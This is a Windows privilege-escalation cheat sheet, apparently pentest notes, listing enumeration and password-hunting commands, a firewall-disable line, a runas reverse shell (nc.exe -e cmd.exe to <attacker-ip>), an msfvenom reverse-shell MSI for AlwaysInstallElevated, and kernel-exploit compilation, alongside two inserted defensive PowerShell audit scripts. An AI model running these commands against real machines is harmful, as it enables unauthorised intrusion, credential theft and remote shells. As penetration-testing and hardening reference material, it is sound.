Windows Privilege Escalation

Enumeration

    OS Info Enumeration
      systeminfo
      hostname
      echo %username%
      wmic qfe -> check patches
      wmic logicaldisk -> get other disk information
    User Enumeration
      whoami
      whoami /priv -> check user privileges
      whoami /groups -> check user groups
      net user -> list all users
      net user <username> -> check groups associated with a user
      net localgroup -> Check all the local groups available
      net localgroup <group name> -> List the members of the given localgroup
    Task | Service | Process Enumeration
      sc queryex type= service (lists all services)
      tasklist /SVC
      tasklist
      net start
      DRIVERQUERY
      wmic product get name, version, vendor
    Permission Enumeration
      C:\Program Files : icacls program_name
      icacls root.txt /grant <username>:F (to grant permission to access file)
      Check the PowerShell history file: type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
      Check stored usernames and passwords
        cmdkey /list
    Network based
      ipconfig
      ipconfig /all
      arp -a
      route print
      netstat -ano
    Password Hunting
      findstr /si password *.txt *.ini *.config (try searching in different directories)
      dir /s *pass* == *cred* == *vnc* == *.config*
      dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
      where /R C:\ user.txt
      where /R C:\ *.ini
    AV / Firewall check / Service Enumeration
      sc query windefend
      netsh advfirewall firewall dump
      netsh advfirewall show currentprofile
      netsh advfirewall firewall show rule name=all
      netsh firewall show state (show firewall running or stopped)
      netsh firewall show config (show firewall configuration)
      netsh firewall set opmode disable # Disable firewall
      Note: the netsh firewall context is deprecated and may be absent on current Windows; netsh advfirewall is its replacement.
    Scheduled Tasks
      schtasks /query /fo LIST /v
    Mount Information
      mountvol

Escalation Techniques

Service Account Priv Esc (Token Impersonation)
    whoami /priv
Run As :
    Use cmdkey to list the credentials stored on the machine.
      cmdkey /list

      Currently stored credentials:
          Target: Domain:interactive=WORKGROUP\Administrator
          Type: Domain Password
          User: WORKGROUP\Administrator
    Using runas with a saved credential (the account given to /user: must appear in the cmdkey /list output):
      runas /savecred /user:admin C:\PrivEsc\reverse.exe
    Using runas with a provided set of credentials:
      C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Access check :
    accesschk.exe -ucqv [service_name] /accepteula
    accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
    Find all weak folder permissions per drive.
      accesschk.exe /accepteula -uwdqs Users c:\
      accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
    Find all weak file permissions per drive.
      accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"
      accesschk.exe /accepteula -uwqs Users c:\*.*
      accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
    Powershell (files under Program Files that grant Modify to Everyone; access errors on protected subfolders are suppressed):
      Get-ChildItem "C:\Program Files" -Recurse -ErrorAction SilentlyContinue | Get-Acl | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Unquoted Service Path Privilege Escalation

PATH directories with weak permissions

      C:\Temp> for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
      C:\Temp> for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

      C:\Temp> sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
      C:\Temp> type Servicenames.txt
      C:\Temp> FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
      C:\Temp> FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
      (sc requires a space after "state=", otherwise the option is not recognised)
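The wmic/icacls and sc qc loops above can be folded into one audit script. The following PowerShell is an added example and is not part of the original notes: it lists every service whose ImagePath is unquoted and contains a space, checks the ACL of each directory that CreateProcess would search along that path, reports where Everyone, Users or Authenticated Users hold a write-class right, and prints the quoted ImagePath value that fixes the service. The function names and the $BroadGroups list are this example's own choices; the group names are the standard built-in ones.

```powershell
# Added example, not from the original notes: audit unquoted service paths and
# the ACLs on the directories Windows would search along them. Run from an
# elevated PowerShell so every service's path and ACL can be read.

# Groups whose write access on a search directory makes the path abusable.
$BroadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
# Right names (as FileSystemRights.ToString() prints them) that allow creating files.
$WriteRights = @('Write', 'CreateFiles', 'WriteData', 'Modify', 'FullControl')

function Get-UnquotedServicePath {
    # Services whose ImagePath is not quoted and whose executable path has a space.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $p = $_.PathName
        if (-not $p -or $p.StartsWith('"')) { return }                  # quoted or empty: fine
        if ($p -notmatch '^(?<exe>.*?\.exe)(?<rest>.*)$') { return }    # no .exe to anchor on
        $exe  = $Matches['exe']
        $rest = $Matches['rest']
        if ($exe -notmatch ' ') { return }                              # no space: not affected
        [pscustomobject]@{
            Name      = $_.Name
            StartName = $_.StartName                # account the service runs as
            Exe       = $exe
            Fixed     = '"' + $exe + '"' + $rest    # the correctly quoted ImagePath
        }
    }
}

function Get-WritableSearchDir {
    # For "C:\Program Files\My App\svc.exe" CreateProcess tries C:\Program.exe,
    # then "C:\Program Files\My.exe", so the directories that matter are C:\ and
    # C:\Program Files. Returns those where a broad group holds a write-class right.
    param([string]$Exe)
    $parts = $Exe -split ' '
    for ($i = 0; $i -lt $parts.Length - 1; $i++) {
        $dir = Split-Path -Parent ($parts[0..$i] -join ' ')
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
        $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadGroups -notcontains $ace.IdentityReference.Value) { continue }
            # Rights are compared by flag name; generic-rights entries that print
            # as a bare number are not decoded here.
            $names = $ace.FileSystemRights.ToString() -split ', '
            if ($names | Where-Object { $WriteRights -contains $_ }) {
                [pscustomobject]@{
                    Directory = $dir
                    Identity  = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

foreach ($svc in Get-UnquotedServicePath) {
    $weak = @(Get-WritableSearchDir -Exe $svc.Exe)
    $tag  = if ($weak.Count -gt 0) { 'WEAK ACL' } else { 'unquoted only' }
    Write-Output "[$tag] $($svc.Name) (runs as $($svc.StartName)): $($svc.Exe)"
    foreach ($w in $weak) {
        Write-Output "    $($w.Identity) has $($w.Rights) on $($w.Directory)"
    }
    # Remediation: quote the executable path in the service's ImagePath value.
    Write-Output "    fix: Set-ItemProperty -LiteralPath 'HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)' -Name ImagePath -Value '$($svc.Fixed)'"
}
```

Services marked "unquoted only" are misconfigured but not abusable as long as the search directories stay writable only by administrators; "WEAK ACL" entries need both the quoting fix and a review of the directory ACL.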
Always Install Elevated :
      reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
      reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

      msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f msi > install.msi

      C:> msiexec /quiet /qn /i install.msi
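An added PowerShell check for the two registry values queried above (example code, not from the original notes). The policy is only in effect when the AlwaysInstallElevated value is 1 under both the HKCU and the HKLM key; a missing key or a 0 on either side means Windows Installer will not elevate. The script reads both keys, reports the combined state and prints the remediation commands. The function name is this example's own.

```powershell
# Added example, not from the original notes: report whether the
# AlwaysInstallElevated policy is actually in effect (both keys must be 1).

$Keys = @(
    'HKCU:\Software\Policies\Microsoft\Windows\Installer',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $entries = foreach ($k in $Keys) {
        $v = $null
        if (Test-Path -LiteralPath $k) {
            # A key may exist without the value; the property then comes back $null.
            $v = (Get-ItemProperty -LiteralPath $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{ Key = $k; Value = $v }
    }
    [pscustomobject]@{
        Entries = $entries
        # Enabled only when every key carries the value 1.
        Enabled = (@($entries | Where-Object { $_.Value -eq 1 }).Count -eq $Keys.Count)
    }
}

$state = Get-AlwaysInstallElevatedState
foreach ($e in $state.Entries) {
    $shown = if ($null -eq $e.Value) { '<not set>' } else { $e.Value }
    Write-Output "$($e.Key): AlwaysInstallElevated = $shown"
}
if ($state.Enabled) {
    Write-Output 'AlwaysInstallElevated is ENABLED: any user can run an MSI package as SYSTEM.'
    Write-Output 'Remediation (run elevated, or set the policy to Disabled via Group Policy):'
    foreach ($k in $Keys) {
        Write-Output "  Set-ItemProperty -LiteralPath '$k' -Name AlwaysInstallElevated -Value 0"
    }
} else {
    Write-Output 'AlwaysInstallElevated is not in effect.'
}
```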
Kernel Exploits :
      i686-w64-mingw32-gcc exploit.c -o exploit
    or, when the exploit uses Winsock, link ws2_32 (same 32-bit cross-compiler):
      i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32

Automated Enumeration Tools

Powershell:
Metasploit :
    getsystem
    run post/multi/recon/local_exploit_suggester
Resources :